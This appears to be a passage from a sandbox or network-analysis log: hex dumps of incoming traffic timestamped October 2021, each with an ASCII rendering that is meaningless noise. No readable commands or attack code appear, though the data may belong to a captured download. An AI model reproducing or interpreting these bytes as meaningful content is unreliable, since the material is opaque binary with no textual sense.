                                                                            2021-10-13 17:30:43 UTC73INData Raw: 9f c7 75 21 31 de 3f ac 6d 9c 72 c3 d2 97 d5 b0 2e 93 c2 e0 11 4b 2a 5a f0 d8 29 24 ed d9 da c9 94 fb 98 cd b2 66 72 f1 48 fb cb 2c 7b f4 e4 cb 60 3d 1a d6 2a 62 6f 90 10 ed 29 c3 16 b2 16 40 8d 6c aa 3e 17 fe e5 94 11 8b f4 63 64 5e 5c 13 2c 2b 24 a9 15 7c 47 c6 c3 34 bc 52 00 c8 76 49 f3 e2 8d 4a b6 e0 25 51 8d a5 07 1d 1a 17 ad 4e 13 2d 67 24 7a bf b5 11 55 83 38 ec 01 7d 2b bb 1e 8d 94 aa ff 7c 44 60 d1 e9 09 ad 45 ce d5 d4 d4 c5 d5 68 d6 b4 be 7a 5b 1b 36 92 c1 20 fe d5 8b 8e 0e ac a9 9e df 75 33 8b e4 43 e0 55 48 2c 7e 96 cc bb 1d be 2b 31 8b 04 50 7d 62 dd e9 de a5 fe 4f a5 74 08 70 d7 b9 db 52 71 2e fc 46 ec 07 33 bc 0e de 4f 9c de 47 cb a0 07 de 95 04 0a c3 d1 f9 d5 c1 7e dd 12 48 9a 4e 9f 50 de 59 b0 23 87 1c 70 37 0b 02 f8 a9 66 96 0f 21 61 9a
                                                                            Data Ascii: u!1?mr.K*Z)$frH,{`=*bo)@l>cd^\,+$|G4RvIJ%QN-g$zU8}+|D`Ehz[6 u3CUH,~+1P}bOtpRq.F3OG~HNPY#p7f!a
                                                                            2021-10-13 17:30:43 UTC75INData Raw: 05 08 f6 a6 5e b3 de 9c 2d 55 98 9f 37 bf 67 42 0d c0 8a 89 71 2f bc bc 3f 5f 20 78 8a 83 93 4e b8 9a 33 a3 c6 a3 10 1a 2e 86 ef 6f a1 ed 68 6b 0f af 62 74 d0 70 b7 be 78 50 35 a0 3e 64 ca 0e 12 a2 c2 da fb 82 6f 69 85 6a 4b 9e 5a f9 be e6 a4 3d fd 46 3e be 74 ef e3 02 0e b8 f6 3f fe 38 46 89 66 e4 f7 4e e8 6a b6 31 a4 f9 4e 28 56 a9 27 32 5a c1 02 87 07 dd ac 13 9d 7b 57 ce c0 91 29 ef 86 7a de de b6 c2 7a 5b 22 95 1d 56 09 cd 11 64 60 92 2f fe eb f2 84 cf 1c 8c fd 26 f9 f8 9f 56 b7 e9 7c ef bb ea 7e c3 77 23 f8 fb 2e c6 f6 ce 4f 8c 05 08 a4 9f a6 65 c8 9d dd 54 e3 b8 61 da a2 a5 46 b5 8b 72 f2 09 f0 fb 9f a3 84 87 25 89 d6 4f 81 41 bb 9f a8 d7 4a 48 8a 3b a2 12 7c 77 92 6f d6 50 c0 f4 3c b2 06 c7 42 cf af 99 11 7e b6 08 f1 5c 56 d4 b6 55 64 40 7b 80 17
                                                                            Data Ascii: ^-U7gBq/?_ xN3.ohkbtpxP5>doijKZ=F>t?8FfNj1N(V'2Z{W)zz["Vd`/&V|~w#.OeTaFr%OAJH;|woP<B~\VUd@{
                                                                            2021-10-13 17:30:43 UTC76INData Raw: cf 09 ff ed d9 cb 7d 12 f5 87 df 90 a9 64 d9 da 66 da 28 0b fb fa af f6 26 ca c5 18 75 c9 90 1a c5 8d d2 18 a7 d3 5f c0 da bb 31 18 e2 c5 47 11 8b f4 ea 60 50 4f 14 33 71 b9 a6 19 4b 45 df 5f 2f 98 5e 2f d4 25 7e e0 ec 80 f6 a6 6d 1f 47 80 9c 89 11 0b 19 bb 67 94 23 99 25 ca a0 6b 26 4a 8c a6 d5 1b 65 34 d9 8e 83 95 be df bb 5b 6a 2f 74 34 b6 5b f9 95 4d c5 cd d8 5f bb 28 af 7e 51 44 1a 0f d0 2e fc c1 c1 12 16 bd bc 40 27 59 3d 5b 62 52 ee 48 69 18 97 96 c6 b7 9e a3 28 2e 88 04 42 1f 72 ff e3 d1 ad 40 4a a5 72 82 49 f7 a6 d7 78 93 6e c3 44 70 16 22 be 0e c1 2d 1f da b7 d5 82 10 aa 26 17 04 dc c1 cf 33 c1 77 c2 95 a7 95 71 92 6f b2 d6 b1 23 9e 13 79 e9 16 38 c7 60 67 ba 0b e2 79 9c 85 8a 8d f4 56 c1 87 95 1e bf 8a 08 09 6e 42 ba d2 a3 8b 0b ec 93 97 18 d5
                                                                            Data Ascii: }df(&u_1G`PO3qKE_/^/%~mGg#%k&Je4[j/t4[M_(~QD.@'Y=[bRHi(.Br@JrIxnDp"-&3wqo#y8`gyVnB
                                                                            2021-10-13 17:30:43 UTC77INData Raw: 74 ca 79 8d 94 cd 4f 94 89 58 12 c6 a4 0c ef 30 b6 c5 c3 aa ed 65 79 f7 86 ef 72 fb 74 b4 e3 7a 2b 56 d3 28 62 e0 26 1d a8 d0 a4 f9 82 61 6e 89 42 e9 89 6a fd 96 d6 a6 3d f7 47 14 b7 4d 5a ec 29 13 d7 e8 2a 00 33 79 87 68 fc fc 71 62 95 b7 1d b7 e2 54 23 cb a2 dd 22 72 ac 33 87 2c 34 bd 66 e1 68 5a f2 99 b2 2b ec ea 1e cf d3 28 fb 7c 4a 24 e9 a1 55 09 ef 39 c0 64 94 29 d6 44 e4 8f ee 14 89 eb 34 2f c8 b3 54 a5 db 3b e9 ad 14 0c 38 74 34 f9 e8 2e cf 0f db 4b f2 2c 0a 89 6b 29 19 a3 9d dc 43 c6 8b 6c cf ce cb e4 a4 80 4b e2 18 e0 fc bb b6 09 80 25 89 d7 f9 90 50 bb 9f b4 60 40 59 9a 04 fb 13 50 7f ac 75 c7 41 46 26 22 8f 14 c6 d3 e7 b9 81 ef 75 4a 1f da 5e 7c 1f a0 2e 08 4a 53 b0 3c b0 78 28 bd 91 2b f9 82 db b9 ea 3a 4c a6 5d 1d 5d 68 80 5e 5c 4e 24 bc 50
                                                                            Data Ascii: tyOX0eyrtz+V(b&anBj=GMZ)*3yhqbT#"r3,4fhZ+(|J$U9d)D4/T;8t4.K,k)ClK%P`@YPuAF&"uJ^|.JS<x(+:L]]h^\N$P
                                                                            2021-10-13 17:30:43 UTC79INData Raw: 14 c9 32 6a de 90 10 e7 b6 ff 13 85 33 5a c6 f6 c8 16 0a e2 cf 3d 13 f8 a5 fe 75 56 2c 4d 32 71 be ba 18 4b 1b d8 5f 23 dd 65 1d d7 2f ba d9 ed 80 53 a4 02 4c 50 8d a2 17 3b 34 1c bb 68 e4 05 65 24 ec c1 e8 07 4a 8a a6 92 4d 64 34 d5 81 b4 da b6 df b4 2b 48 d3 75 12 cc 0a d0 a2 4e c7 a4 8c 76 95 2e ac 5c 06 01 7a 08 bf 06 e1 ca c6 7d 48 a3 b7 b8 0c 6b 20 bb 7a 52 c6 4a 41 0c 9f 96 cc aa 97 a4 0e 35 81 1c 49 1f 72 ff f4 cd 8e 7c 48 b3 8a 95 4d db b1 dc 72 82 36 02 47 5c 14 16 a1 28 22 26 7b b4 49 d4 aa 32 b0 0b 16 79 a7 de d9 3a eb 7e dd 8e 4a a4 5f 9a 7f ad d4 b1 2b 81 0f 65 ff 14 0c cb 9e 61 81 fb 33 4b 9e 9d 83 a5 e7 40 3f 8c b5 03 b0 8c 08 07 69 aa 45 ff 8d b5 0d ef 4b 90 63 af e6 e6 2d 80 d6 4e 69 07 d7 bf d4 6c 48 1a 5f 46 5f 41 c0 66 25 db 7b 42 b1
                                                                            Data Ascii: 2j3Z=uV,M2qK_#e/SLP;4he$JMd4+HuNv.\z}Hk zRJA5Ir|HMr6G\("&{I2y:~J_+ea3K@?iEKc-NilH_F_Af%{B
                                                                            2021-10-13 17:30:43 UTC80INData Raw: 5f 76 cf 65 86 9c 7e 4f 2b f3 cf 66 ca 04 83 ad b2 d8 d9 30 65 44 89 de ef 85 4c e0 85 62 a0 22 e0 61 b1 b7 5c 4c 7b 04 17 cf cf 8d fe 32 55 19 76 e8 e5 69 0d f7 b0 2e af d5 b1 23 cc ba bf 25 41 b5 07 ca 9b d1 a0 01 94 67 c6 f0 ac 8d 36 ae 0b 72 d0 cd 33 c4 e0 4c 3b e5 b1 ba 09 c7 39 5c 62 8d 09 c9 2e 6e 82 da 2e 96 f8 bf d7 d6 bd 76 31 d0 3b ee 27 ec 12 37 56 c6 f2 e8 29 4b f7 c5 43 ef 4c 94 a4 97 0e 7d 8e 01 da 58 ca b6 63 50 b5 bf c3 84 45 61 e2 18 7c e9 94 9c 29 26 25 89 d7 c0 96 4f 83 a9 41 4b 5b 59 01 15 1a 38 5c ab b4 7e c7 da 56 c7 08 83 f1 d1 d8 e7 22 9f 0e 58 79 3a 6d 5a 48 d1 bd 20 f8 4c 4c 9a 0a 0e 7c 34 ef dd a0 f9 86 f1 25 ec 25 6f 89 16 81 73 77 b1 48 51 48 3b 9f 66 a1 db 40 84 c4 fd 8d db b0 c8 cb de bc 24 f2 f9 97 24 bf 6c ba 42 57 be 2f
                                                                            Data Ascii: _ve~O+f0eDLb"a\L{2Uvi.#%Ag6r3L;9\b.n.v1;'7V)KCL}XcPEa|)&%OAK[Y8\~V"Xy:mZH LL|4%%oswHQH;f@$$lBW/
                                                                            2021-10-13 17:30:43 UTC81INData Raw: f9 5d e7 47 0e 35 6a 90 d7 1a 63 5f b2 77 27 b2 4b 00 da 36 de e2 fd 8b 4a b7 93 0f 7d 87 b5 1c 02 01 28 b6 71 99 3e 6c 24 f7 a5 a4 0d b4 8d 88 e2 1e 62 32 c2 8a 06 b2 05 db b2 42 48 66 71 18 a5 49 f9 cd 49 c5 cd a1 53 97 28 a9 6b 4b 17 71 0e c1 25 fc c4 32 13 33 b2 a6 b9 0e cf 37 8b 7e 3d c4 48 41 0a 88 99 df b0 81 be 2e 38 7f 1a 72 e2 64 c0 fd d5 94 77 50 b7 8a 95 4d db 8d d2 4a af d0 03 b9 79 3c 2e 93 06 c1 6d 00 cf 49 7f ae 18 83 1f 19 2f ed de d1 29 3f 7f f1 8c 41 98 5d 92 4f 53 d5 9d 2c 83 71 d2 e9 1f 23 c6 b6 f4 97 05 38 6c 85 89 88 ad f6 a8 c0 a1 9b 16 ab 87 00 19 8f 55 68 d1 a4 9c 24 09 80 05 18 d3 ec e1 33 ad 7a fb 70 a0 c4 ac d5 68 68 30 5f 46 4c 62 f2 63 0d 2e 7b 42 b9 8a 58 53 f8 22 03 29 cf ea 37 22 00 4c 8e 55 1b 0b 56 07 98 1d 01 75 dd 1b
                                                                            Data Ascii: ]G5jc_w'K6J}(q>l$b2BHfqIIS(kKq%237~=HA.8rdwPMJy<.mI/)?A]OS,q#8lUh$3zphh0_FLbc.{BXS")7"LUVu
                                                                            2021-10-13 17:30:43 UTC82INData Raw: 1e 00 7c b7 75 2b a2 9c 30 18 81 49 dd 69 d4 b3 97 28 af e8 3e d2 a7 92 1d 55 a1 0f 96 bc 0b 3d 5a 4b 6c 7f 80 94 95 34 f7 ed 99 38 42 45 79 47 22 33 96 fd 4a 40 d3 5c 31 b3 72 95 62 71 c3 99 c0 b0 3d 44 e9 ef 15 a9 a8 54 ef c5 1f f7 c3 d9 da 5f 93 c6 8c fd bc bf 72 f7 42 ba 75 20 64 ed f8 bc fb 5f a8 c9 30 48 c2 81 17 fe a4 c4 0b bd 1c 4e a9 39 bb 30 02 f1 d7 6c 0f 9a e5 ee 65 3f a2 0f 33 7b ab b3 1c 71 52 f5 69 27 b2 47 70 1b 25 d5 e8 fd 90 42 70 7e 1e 40 9d b5 06 21 d7 6a 07 6e 8b 27 6a 32 e1 c1 8c 04 4a 86 b3 27 1c 76 27 df ba 73 9a b3 df b5 55 6c be 41 1a a3 55 f9 1f 4c c5 cd d8 5f bb 28 af 7e 51 37 71 07 f8 90 e7 ca ca 7d d3 a2 b7 b4 21 64 3f e4 4c 50 ee 40 69 b3 93 96 ca ad a9 81 25 2e 8b 0d 6d ea 7a fb 36 d1 85 7a 20 69 74 94 6b de b7 db 1d b1 2c
                                                                            Data Ascii: |u+0Ii(>U=ZKl48BEyG"3J@\1rbq=DT_rBu d_0HN90le?3{qRi'Gp%Bp~@!jn'j2J'v'sUlAUL_(~Q7q}!d?LP@i%.mz6z itk,
                                                                            2021-10-13 17:30:43 UTC83INData Raw: dd 12 97 5e ac 7e 05 83 ea 7f de 39 5b b8 64 75 d7 f0 ee 5a ee f1 76 5a 80 3b de e9 f0 b8 20 69 50 7a 00 16 74 b7 fd 75 c1 35 1f 76 d1 1a d8 d8 8a 01 18 dd c3 8d 5e df 15 9c 24 4d e8 29 0c 67 7d f7 30 69 96 ae 71 26 be 72 37 73 d5 6f a0 99 3e 4e b1 9d be 18 ea a1 0d 1c 31 93 db 2a a0 c1 60 4a 0b ac 47 77 c7 a0 94 07 70 61 f7 d0 36 b0 e0 04 0c 9b ab cd 4a 83 65 44 3a 42 e9 8b 4c ec 9f c6 43 3d f7 41 14 a6 55 56 19 03 24 da eb 3e 24 be 6a 85 70 f6 ef 72 6f 78 bf 31 a4 fc 44 dd cd 96 26 35 54 b2 0b 8c 07 c6 b6 00 75 69 76 f0 a5 fa 03 f1 84 7d cf c2 25 c6 82 4b 08 f9 89 44 00 c7 28 c9 7a 6c 28 fa 65 e3 80 d2 83 b6 ec 23 d0 df b7 a7 bc d0 31 d7 2f ea 0d 14 67 26 e4 ea 52 11 f1 da 63 f3 96 17 dd d7 9f fe d9 98 ca 6f d7 a8 6e c6 99 bf ed b7 8d 61 f3 11 f8 11 8a
                                                                            Data Ascii: ^~9[duZvZ; iPztu5v^$M)g}0iq&r7so>N1*`JGwpa6JeD:BLC=AUV$>$jprox1D&5Tuiv}%KD(zl(e#1/g&Rcona
                                                                            2021-10-13 17:30:43 UTC84INData Raw: 44 b5 28 6b bd cc 3c 42 58 cc 7f 91 8a 8b b4 65 c1 95 30 2f a4 57 47 26 b7 37 df 77 50 a2 cf 20 bc 67 bb b4 5e ef 90 f2 66 07 46 c2 ff 28 c4 34 54 fe c0 16 95 13 d8 f6 5f 94 f9 90 03 81 b1 6d ba 5b 68 da 33 6b f2 e4 51 fd 00 1d f1 b8 4b c9 90 0f cd a6 dd 18 bc 02 40 ec 0e ba 1c 01 da ab 46 11 8b eb d4 66 5f 43 1f 3c 6e a2 46 1a 4f 41 df 4e 2d 9a 17 1f d7 2f ba 63 ed 80 53 2a 52 0e 51 8c b7 12 0c 10 0a b4 6e 9a 22 78 32 18 af 97 13 48 8a 20 ec 07 4d 6e d3 82 96 f5 31 de b2 42 73 d4 6a 0f b0 50 d1 b3 47 da 80 30 76 b9 25 be 78 56 0a 44 57 d3 2e e3 d5 80 01 10 a2 a6 b1 39 3c cd 8a 54 69 ec 48 42 1d 9d f8 1b 3f 9b c0 a1 2f 81 1d 2d df 71 d3 fc ab ba 7e 4f af 5c d4 63 d9 ac d5 09 42 2e fc 42 03 57 3f a3 09 e9 66 02 cf 43 fc ed 1a 92 03 7a 81 dd de df 21 8b 6d
                                                                            Data Ascii: D(k<BXe0/WG&7wP g^fF(4T_m[h3kQK@Ff_C<nFOAN-/cS*RQn"x2H Mn1BsjPG0v%xVDW.9<TiHB?/-q~O\cB.BW?fCz!m
                                                                            2021-10-13 17:30:43 UTC86INData Raw: 8f 4d fc a9 a7 03 7e d1 cd 20 10 72 9e 03 7d f7 c7 0f 53 d2 27 ad c7 5c 0d 0c d3 e4 85 5c b5 dc 83 1f b7 67 b2 12 85 e5 44 26 43 92 9f 62 20 a7 9d 39 40 99 87 8b af 3a 76 5c 71 bf e6 d9 ea 09 1e 31 8b c8 cc 5f ec 4e 72 0b fc 05 70 d0 72 9c 84 e9 4f 32 93 a0 9a 35 fb 06 b8 a2 cd e8 8d 7a 06 77 43 c5 a9 58 fc e5 c0 a4 3d fd 58 7e c4 18 4e e7 08 20 92 ed 3d f4 1a 13 87 70 fd e4 19 f0 6a b6 37 c6 cb 5d 23 c6 c4 1c 21 5e a4 30 c5 05 d7 b5 0e 80 77 19 e5 bc 90 38 e0 8e 8a ce ff 1a d3 7f 39 1a f8 91 5d 10 ad 4a 84 66 92 23 fe 10 f0 84 cf 27 cf ee 23 db d1 f0 d2 bc d0 3d 9d 85 e8 0d 1e 08 1c f0 e8 23 ff b1 d8 67 fa 2f 41 a0 88 21 69 d2 8e d3 47 fd a6 71 ec 4d a1 c8 85 8d 70 eb 11 f1 e6 1d ab 05 c2 ff e5 f4 5c 90 50 aa 89 bf 4b 1b 02 b5 82 05 12 76 c4 2b 61 e6 55
                                                                            Data Ascii: M~ r}S'\\gD&Cb 9@:v\q1_NrprO25zwCX=X~N =pj7]#!^0w89]Jf#'#=#g/A!iGqMp\PKv+aU
                                                                            2021-10-13 17:30:43 UTC87INData Raw: 93 dc 6a 52 a2 d9 cf b2 54 80 5d 4c cc 99 db a9 11 0b 3c e1 3d d5 10 51 d7 5a fa 20 12 f3 c1 65 82 f5 f6 d2 92 bd c4 f1 48 76 d8 59 a2 ed fb ab ff a8 85 d6 3d 02 8d 96 10 ed b7 d1 6b 93 0f 5f cc e9 d1 43 4c e0 c5 4d 39 ce f6 ff 7f 78 05 0c 33 7b a0 d7 9f 62 59 db 2c 1b b0 4d 15 a9 1a d7 e2 e6 a8 15 a4 6d 04 dd 6d a4 14 12 07 0f b6 6c f0 e6 67 24 e2 82 fe 04 31 47 a4 fd 0b eb 83 de 80 9e e1 78 df b2 40 14 50 75 18 a2 5d aa 69 48 c5 cf 40 c0 19 17 af 74 46 0c 52 3d d1 2e e9 e2 96 12 1f a8 a0 68 ab 5f 33 8b 7a 7a a4 48 41 06 e3 b5 cc bb 9a d2 ee 2e 81 1f 75 f2 71 db de 8f 85 7c 45 b2 a2 19 4b d9 a6 d5 0f 4e 2e fc 42 66 1e 15 f9 03 c1 2e 13 de 5a d2 96 89 97 09 15 06 df ad e7 3c c1 74 c3 e4 2a d0 5f 9a 5d 85 91 b3 23 8b 1e 72 f1 c7 54 91 9c 66 9c 2d 77 65 9c
                                                                            Data Ascii: jRT]L<=QZ eHvY=k_CLM9x3{bY,Mmmlg$1Gx@Pu]iH@tFR=.h_3zzHA.uq|EKN.Bf.Z<t*_]#rTf-we
                                                                            2021-10-13 17:30:43 UTC88INData Raw: 39 f7 f7 8a 5e df 1b 9c 24 4d 15 a0 19 bd 46 59 4c 30 c9 a1 71 25 8f cb 34 5f db 6f ca 8e 32 4e b8 89 3b d2 c6 a3 1e 18 20 9c 11 5b 8b ed 62 63 72 57 c3 70 d4 67 92 28 30 52 3f d9 2a 1d 0c 04 1f af aa be c7 80 65 4e 98 4a 9a de 58 ff 9c d6 e3 3f f7 4b 05 b3 2f 0d e5 02 02 ff aa 3f fe 38 7d c3 72 f7 f6 67 71 7a bb be 9c f5 5f 21 b7 77 23 23 5a 19 77 96 06 d7 b5 bf b3 c7 5a f6 b3 92 52 24 97 74 cb da 3d d7 aa c5 0e fa 91 55 72 17 39 c0 60 83 24 fe 12 f3 84 cf 0d f2 2a 23 d1 cd 98 25 83 d2 3b e4 aa e2 7e 50 74 23 f8 c0 6c d5 f1 d0 76 f4 74 49 a0 88 21 4a 8d 9f dc 4d c4 ef 6c cc b9 b1 e1 b5 89 ee cb 18 e0 ed f0 79 09 a8 21 3e b8 4f 91 50 a0 2b 94 1f 59 22 56 13 05 16 75 6c b2 a8 48 6c 50 d8 21 d8 c6 d1 d8 e3 af 94 13 73 15 23 f3 5c 5d ed aa 26 20 48 53 be 3e
                                                                            Data Ascii: 9^$MFYL0q%4_o2N; [bcrWpg(0R?*eNJX?K/?8}rgqz_!w##ZwZR$t=Ur9`$*#%;~Pt#lvtI!JMly!>OP+Y"VulHlP!s#\]& HS>
                                                                            2021-10-13 17:30:43 UTC89INData Raw: de 02 c8 7d f5 d1 44 8c e2 1d fd 83 bd 72 fb 5b 62 f2 33 64 ed f1 0d fa 3d 10 53 24 6a 04 94 10 eb a2 5f 1f ad 0d 5e d5 fa aa 3a 1e ca 0b 43 11 8d 56 ee 7f 44 57 1a 1b d2 b8 b8 11 75 d5 e2 5f 25 b3 5b 37 26 24 d5 e8 c0 82 7e e3 6f 0c 2a 41 a4 14 17 7f 98 bb 6e 8a 3c 63 33 30 23 ae 06 4a 8d 8c b7 0d 65 3e a7 a3 9c 9a a8 a2 7e 44 60 d5 77 63 6f 5f d1 a6 59 c1 cd df 73 0f 00 33 74 47 0e d8 1f d4 39 35 d9 c8 03 1b b3 bf 80 6b 8b cc 74 7a 50 95 83 41 0c 93 91 43 90 81 af 27 55 54 1b 5e e5 64 b9 2c d7 fe bb 4f a5 70 fa b9 63 c9 51 73 85 28 d6 46 63 26 3f a3 29 c1 24 00 c9 49 d4 bf 0e 99 22 0e 04 db c9 27 3f ed 7c c5 85 59 93 4b 64 56 81 d6 a6 28 81 08 6c 17 1e 0b d2 b5 64 bd e6 30 1c 57 85 88 a1 6e e1 eb 8d 99 12 97 84 08 75 71 54 44 db 8f 9e 1e d2 a3 b9 43 d3
                                                                            Data Ascii: }Dr[b3d=S$j_^:CVDWu_%[7&$~o*An<c30#Je>~D`wco_Ys3tG95ktzPAC'UT^d,OpcQs(Fc&?)$I"'?|YKdV(ld0WnuqTDC
                                                                            2021-10-13 17:30:43 UTC91INData Raw: 77 f5 79 8a 89 25 6e a1 8b 42 19 d4 a8 32 85 30 9a c1 c7 a8 cd 63 60 09 87 4e 5b d0 76 9e 13 75 70 3e d2 28 66 47 2f 1f ab ac de fe 93 6e 6c 36 40 e9 9c 4c e9 85 ed b4 2e e6 4c 34 b7 5d 4c e7 11 1c c5 fb 15 68 33 55 83 63 fe ed 7d 5c ba b2 31 b3 e3 49 30 d8 a8 37 32 59 8e 18 84 07 d7 ac 0e 99 7b 72 60 b2 90 2f fc 9e 07 ed d1 2c d7 6f 42 35 f2 80 5b 66 ef 3b c0 62 84 3a d3 43 e3 89 4b b8 9e 36 30 c4 da 91 7d a9 c1 36 ff b5 7b 1b 3a 64 32 f7 ff ff c4 f4 cb 69 e7 d1 1b ac 99 25 73 dd ac 3a 56 e1 dd ef cc b3 a1 f5 a1 93 bb f5 ce 6d c4 8b b4 08 80 6f 8b d7 56 e4 42 aa 89 a4 58 56 48 95 3b 42 13 7c 77 a5 73 a8 50 51 d8 29 cc 32 d3 d8 e1 a8 8a 14 60 75 1b e7 4d 50 72 15 42 be 59 45 a7 19 b9 53 3a c7 ec 24 68 90 df 9e fb 3c 4e 91 4e 12 e4 77 8f 3f e5 a4 25 ad 4c
                                                                            Data Ascii: wy%nB20c`N[vup>(fG/nl6@L.L4]Lh3Uc}\1I072Y{r`/,oB5[f;b:CK60}6{:d2i%s:VmoVBXVH;B|wsPQ)2`uMPrBYES:$h<NNw?%L
                                                                            2021-10-13 17:30:43 UTC92INData Raw: c7 cd 30 44 d8 94 9c 96 b5 d2 19 85 16 5e c6 fa c8 66 0a e2 cf 3d 18 9c 2e e8 a3 dd 68 0e 33 70 ab bd 18 67 48 d8 4e 20 3c fa 0d d4 33 fd 8b ec 80 53 b5 69 1f 55 9b 5a 17 18 0c 35 ac 46 58 29 67 22 f7 aa 37 7d 4a 8c a5 d5 14 64 34 d9 f1 ca 98 b3 d5 c8 55 65 fb 75 18 a3 4c e1 a7 48 04 ca ce 77 55 28 af 65 51 17 70 36 62 2f e3 ca cc 03 15 bd b8 40 27 59 34 9d 6b 5a f1 5a 52 06 97 87 c6 a4 8a 51 24 02 8e 0a 58 f0 74 5d 41 ea d1 7d 4f a5 6b 98 72 d3 a6 c6 78 98 d0 fd 6a 77 07 39 8e 55 df 37 0a cf 58 de b0 e6 93 25 13 2f f4 c1 d0 2d cb 7e cc 84 46 80 a3 9b 7b bf c5 b4 35 88 07 65 ec 91 90 f8 ab 67 96 0f 2d 72 8f 8f 88 b4 ea 49 cb 73 98 2d ad 96 0e 17 a7 47 42 cc 84 8d 05 c4 b9 98 02 2d e7 ca 2f bc e7 4a 71 69 a1 bf c5 62 7d 13 a1 47 60 7a c5 77 09 55 cc 94 b2
                                                                            Data Ascii: 0D^f=.h3pgHN <3SiUZ5FX)g"7}Jd4UeuLHwU(eQp6b/@'Y4kZZRQ$Xt]A}Okrxjw9U7X%/-~F{5eg-rIs-GB-/Jqib}G`zwU
                                                                            2021-10-13 17:30:43 UTC93INData Raw: c2 62 d4 64 9d 12 78 42 3a c1 2b 4e 66 05 1f ad 94 ca fb 82 65 6c 39 43 e9 9c 49 f9 87 f8 a4 46 2e 41 14 b3 5e 37 3b 02 08 d3 f9 a7 85 ed 55 85 74 98 62 77 74 6d b4 4a 69 f5 5f 27 da 20 58 c3 5e ae 1c ea 6f d5 bf 17 55 20 7f de 84 90 29 e5 84 7c cc c2 24 f9 13 4a 24 fc b9 82 0d c7 3f e8 cb 93 29 d0 73 e4 97 c2 27 b1 ec 23 db 17 bc 73 95 e7 3b ee b1 f9 04 17 56 22 f2 e8 a9 ff 24 de 67 f6 2f a7 a3 88 2d 44 de 8e db 6f d4 a9 6e c6 6d a0 f5 a3 bd e7 e3 18 e0 f9 89 cf d5 a8 25 8d 59 eb 87 8a bd 53 ac 44 48 52 a5 dc 05 12 7c 7f cf a2 c7 46 54 c9 28 39 05 dc da 9c 62 99 11 70 77 16 e6 8a cd ef ae 57 1f 97 53 b4 12 be 34 3a c6 ec 27 ed ae 27 bd ea 3c 49 1b 58 1d 75 69 94 4a d9 66 87 ad 46 77 f3 dc 84 58 f1 83 e4 bb ef e9 da a3 16 fb 44 0c 22 a0 58 8e f6 43 96 8c
                                                                            Data Ascii: bdxB:+Nfel9CIF.A^7;UtbwtmJi_' X^oU )|$J$?)s'#s;V"$g/-Donm%YSDHR|FT(9bpwWS4:''<IXuiJfFwXD"XC
                                                                            2021-10-13 17:30:43 UTC95INData Raw: ff 73 41 4d 61 07 73 b8 b2 04 59 36 36 5e 25 b8 5e 13 c6 29 c0 d9 6e 80 55 a6 6b 1f 5f e2 90 16 13 01 0f aa 62 e4 c2 67 24 ec c1 d1 04 4a 86 b7 f0 1e 68 1c 6f 80 9c 9c a8 b0 d9 46 60 db 59 2e a5 4e df cd 7c c7 cb c4 66 99 3f 79 1b 4f 05 7a 04 bf 44 e1 ca c6 1e 0e a9 9f 90 25 75 35 e4 14 50 ee 40 67 1d 9c 90 dd b5 ee 9b 27 2e 8b 74 32 e3 73 d9 d0 fe a3 6d 42 8d 05 94 61 df 8b ca 63 8e 06 d2 45 70 10 52 cf 01 c1 2e 26 de 42 d2 bf 16 fd 3d 17 04 d6 b1 b5 3c c1 74 fb 9f 57 83 8b 89 59 bc da a0 3a bf 59 8b 16 e0 2f fd ae 77 9d 2d e9 63 9c 83 e7 c9 e2 56 cb ab 88 0a b6 8d 1c 28 cd 56 44 d5 99 13 08 c4 a8 93 0c c7 f2 ce 8a aa f4 46 42 6b ab bf de 07 0f 18 5f 4c 6a 60 c9 4e 29 d8 7b 44 d6 4a 5a 53 e3 12 00 07 9d e1 51 ea fe 4d a8 00 03 25 0b 26 91 10 39 30 dd 37
                                                                            Data Ascii: sAMasY66^%^)nUk_bg$JhoF`Y.N|f?yOzD%u5P@g'.t2smBacEpR.&B=<tWY:Y/w-cV(VDFBk_Lj`N){DJZSQM%&907
                                                                            2021-10-13 17:30:43 UTC96INData Raw: b0 5a ec a6 fc a6 7b f7 41 14 b7 5c 4c e7 00 20 c0 ef 3d f4 30 43 f8 91 f7 fc 72 77 43 39 30 b5 ff 73 28 e4 94 21 23 58 dd 3e 87 07 dd c5 19 9d 5a 52 f2 93 6f d6 ef 97 45 c4 fb 02 d3 7c 4c 57 ad 90 57 03 bd 3b c3 19 4d 29 d6 51 f0 80 b8 ef 89 ec 27 fb c9 9f 45 8d d3 3b ab bb ea 0d 14 76 23 f2 ea 2a d3 d9 68 66 f0 01 0d 8a 07 2a 62 c2 b1 d7 6f c2 ab 6e ca c0 86 e6 a4 8e 1b ec 1c c8 60 8a b4 03 84 2e a1 f9 5e 90 56 d9 af bd 4b 51 23 9f 04 78 f3 7c 7d b0 7c c2 48 54 f0 5b a3 16 d7 a5 05 be 99 15 5e 66 1d f1 4f 67 f8 a2 9f 64 4a 53 b4 16 92 7a 29 e8 ea 2b f9 8c f3 af 97 d6 5f 96 5b 1f 63 15 6d 5e cd 4a 26 ae 3b 98 db 40 80 5a ff ef 0e af c7 53 da 83 10 ad c8 0b af 8b 59 9a e3 2a 59 2f f5 45 98 03 56 9a 7f df fd 2a b1 5f 3a c8 55 6b 15 61 34 53 76 fb cc ff a4
                                                                            Data Ascii: Z{A\L =0CrwC90s(!#X>ZRoE|LWW;M)Q'E;v#*hf*bon`.^VKQ#x|}|HT[^fOgdJSz)+_[cm^J&;@ZSY*Y/EV*_:Uka4Sv
                                                                            2021-10-13 17:30:43 UTC97INData Raw: a6 7c 0b 4d 73 a5 38 05 0d 3c 45 69 3d 2c 67 22 95 d2 b9 06 40 ff d9 ff 0f 6f 38 ce 91 99 9a a2 da ad 4d 9e d0 59 12 aa 30 aa a0 48 cf d4 c4 64 90 28 be 71 5e fa 7b 22 db 2d e1 b9 78 13 1f a4 bc a4 35 70 33 9a 7d 4a 10 4b 6d 07 95 95 bf 0f 80 af 23 24 98 08 5b e1 62 d6 ed 2b 84 50 45 a2 72 e9 8a d9 a6 d3 6e 96 2b fc 57 75 08 c3 a2 2f d6 23 25 31 4e 62 af 18 94 7a 69 06 dc d4 aa 43 c3 7e d7 83 46 9d 4e 9f 57 bc d1 a7 dd 80 23 77 fe 0c 22 d0 8f 63 89 0f cc 66 b0 87 a3 a0 d8 79 3e 72 66 2b b9 85 13 30 73 54 7f d3 8f 9e c2 c4 a8 83 0c d8 f2 ec 2a ac 80 db 6a 7a aa ac d0 7a 66 32 12 47 4c 7b d3 62 07 f7 7c 44 cd b1 58 53 e8 1e 0d 2a f2 e8 3e 32 e8 d7 a9 8f 03 04 65 3d 98 14 13 86 f4 0f 50 25 9e bf 7c a8 8e 14 d0 54 4e 2b 6d ad 78 9e 9a 88 a8 1d 0d 